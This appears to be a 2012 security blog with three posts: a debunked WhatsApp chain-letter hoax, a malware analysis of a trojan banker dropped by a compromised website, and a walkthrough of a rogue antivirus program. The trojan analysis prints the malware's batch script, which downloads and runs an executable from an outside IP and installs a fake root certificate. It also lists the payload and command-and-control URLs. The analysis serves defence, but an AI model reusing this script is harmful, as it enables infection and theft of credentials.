Sunday, August 26, 2012

Whatsapp Hoax Message Still in Circulation

It seem that a viral message still in circulated around my Whatsapp with hoax content. It has been a few months already since it first appearance on January 2012. Hopefully no more forwarded message like this again.


Full hoax message:
Message from Jim Balsamic (CEO of Whatsapp) we have had an over usage of user names on whatsapp Messenger. We are requesting all users to forward this message to their entire contact list. If you do not forward this message, we will take it as your account is invalid and it will be deleted within the next 48 hours. Please DO NOT ignore this message or whatsapp will no longer recognise your activation. If you wish to re-activate your account after it has been deleted, a charge of 25.00 will be added to your monthly bill. We are also aware of the issue involving the pictures updates not showing. We are working diligently at fixing this problem and it will be up and running as soon as possible. Thank you for your cooperation from the Whatsapp team” WhatsApp is going to cost us money soon. The only way that it will stay free is if you are a frequent user i.e. you have at least 10 people you are chatting with. To become a frequent user send this message to 10 people who receive it (2 ticks) and your WhatsApp logo

Whatsapp is already announced that this is really hoax through their blog.  http://blog.whatsapp.com/index.php/2012/01/it-is-a-hoax-really-it-is/ .



Tuesday, August 14, 2012

Trojan Banker/Password Stealer (B99A6FF84E4404488D789F5D56593735)

Yesterday, I just found one of local website has been compromised and embedded with malicious code. Once user visiting the website, by allowing the Java applet the malware will be downloaded and installed.


The picture above show you that you will be prompted to use Java plug-in to use some 'features' on this website. Lets take a look on the webpage source code. The red highlighted on the picture below is a Windows Batch command that will drop a VB Script file allowing it to download another malware (Windows executable) from Israel website. The website is also possibly has been compromised.


As we can see, the main page of the website has been embedded with extra code. At the top of it is calling the Java applet (Dantas.jar). This Java applet help to run the Windows Batch command. Below is the Java applet code.


If the Windows Batch Command successfully executed, it will save all the VBScript code into Windows temporary directory as a eden.vbs. Then, run the eden.vbs file to perform download and run the malware executable file.


At the bottom of the website also has been embedded with some scam pharma viagra hyperlink.

Now we need to take a look closer on the PE file downloaded from the following link:
hxxp://www.kanibar.co.il/tmp/DSC12012PDF.exe (a1d2a281980fdd75546557a9ba6de0a6)

The PE file is actually a SFX file. It is containing several file including certificate from the malware author.


FileName MD5 Desc.
certadm.dll AED39116FE12C5550975043DA1D1B244 Microsoft Certificate Services Admin
certnew.cer 2B742FEB1883EE5CB418B1CBAB145A7D Fake Security Certificate
certutil.exe 711DB2EF10B6C2AB2080698AEC6C6D08 Cert Util.exe
givetome.exe 6D2C398E03397C9D089EDC0F00AB3FCB http://noeld.com/programs.asp
jeovahjireh.exe 0B2BF362548B244477D9FFB613AF54D4 Malware

The only file are suspicious is 'jeovahjireh.exe'. So we need to take a look closer on this. The file is compressed with UPX 3.07. The PE file is actually some kind of Bat2Exe file binder. Inside the PE file contain Windows Batch Command.
@shift
@break off

echo 274087083240932840982409820482048282830482429384234932408270983238 > %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat
echo 38942489234324hj32b423842h43fndjhs48323jk423432gfdf3gd4f2d4234729482342h3j4bhj234jv2342 >> %temp%\xhuahushbnnmf.dat.dat



set inf=0
set exe="%temp%\msavc.exe"


if exist %temp%\%USERNAME%.dll goto mapa

> %temp%\%USERNAME%.dll echo y


:mapa
%temp%\givetome.exe http://216.17.106.2/~comprapr/KLJAWEIUIJN92838921JAS.JIP "%exe%"

del "%temp%\leiame.txt"

ECHO -------------------------------------------------------------------------------
%tmp%\certutil.exe -addstore root %tmp%\certnew.cer
certutil -addstore root %tmp%\certnew.cer

cmd.exe /c "%exe%"

del /F %tmp%\certnew.cer
del /F %tmp%\certadm.dll
del /F %tmp%\certutil.exe
del /F %tmp%\givetome.exe

echo fhsdkjhfkjdsfkjdsfhdskhfjkhjkhdsjkhfkjsdhfkjsdhfkjdsfds > %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat

. . .

echo jfdeidhpjrher093u40ruhdfuhisufsd90fu43u90urifhdsjfsiofkjsofsdjfsdfdjhfsd >> %temp%\xhuahushbnnmf.dat.dat
echo j943793874324693284632764932843 jfdsjfhkhjdshfjkdhsf>> %temp%\xhuahushbnnmf.dat.dat
echo adgfsvgf354bvt2435tvb234rtg234vtrvc5234tvc254 >> %temp%\xhuahushbnnmf.dat.dat

The code is a bit lengthy and some kind of semi obfuscated. Most of the code are useless. I just cut off some of the junk code.

What the Windows Batch Command do is actually download another PE file from the following URL:
hxxp://216.17.106.2/~comprapr/KLJAWEIUIJN92838921JAS.JIP

The *.jip file will be named as 'msavc.exe' and saved in temp directory. After that it will add the 'certnew.cer' certificate onto the infected machine as a root.


Then, it execute the 'msavc.exe' using cmd.exe. All bundled file will be delete then (certnew.cer, certadm.dll, certutil.exe, givetome.exe).

Now we need to take a look on the new downloaded PE file (B99A6FF84E4404488D789F5D56593735) named as 'msavc.exe'. This file has been packed with UPX 3.08 and written with Borland Delphi.

Based on VirusTotal result the PE file is possibly a trojan stealer, password stealer or trojan banker. Which is stealing user information on victim PCs.


As we can see on the network traffic it will try to access to the following URL followed with parameter content:
hxxp://www.snv1r1.net/2k12v3r1/71164BED09340ABE6D4C69BD.php?op=7A0B4EED571641ED7E277EBE704E09DA3C5D3E

The domain name is still active but the content of the given URL is not available anymore.


Several mutex also created by this malware. The malware also crawling into several sensitive directory.


It also make changes on a lot of places on Windows registry to lower the security setting and get internet settings information.

Online Sandbox Result:
1. https://www.virustotal.com/file/d15d650d4bf08626af7a4e5322c967fb0e3ca23805d9da6904f5f8ee88f0c55b/analysis/
2. http://malwr.com/analysis/a1d2a281980fdd75546557a9ba6de0a6/

Monday, August 13, 2012

Live Security Platinum (RougeAV)

Just couple of weeks ago I just receive a rouge av sample the disguise as 'Live Security Platinum'. Although this malware is already discovered by other people few months ago. Once this malware is installed all your executable file will be mark as 'infected'. None of your file can be executed until you purchase their 'security' antivirus program. Lets take a look a basic dynamic analysis here. In this write up I'm not covering in detail about removing it from your system.

The malware that I received is from a compromised website that has been embedded with java object file that require users to allow their browser to execute the .jar file. This .jar file will the download the .exe install of the 'Live Security Platinum' malware.


The snapshot above show the first run of the malware which is check the latest update, download an install. The installed path will be located on user program data. See the image below.



After finished install it will automatically doing a fake 'scan'. At this time, all your application cannot be execute and has been blocked by the malware.


If you try to run any application on your computer, you will get fake notification that say your computer has been infected by 'malware'.


It will keep remind you to update and purchase their 'software'.


Lets give a try by entering a valid serial number to this malware registration form. The key that I was entered is AA39754E-715219CE. This key is already circulated on the internet. So, I just use it for easy removing the infection.


Once you click on 'Activate' button you will prompt about your successful register their 'product'. All your application now can be able to run normally. Now you will notice that the rouge AV window has been change to light blue color and there an extra shortcut icon on your desktop. It is a shortcut URL to access to the malware website.


If we try to open up the URL you will see there is online user guide for user to read. Until now the website is still accessible to the user.


For removal, MalwareBytes Anti-Malware would be fine to clean all the infection.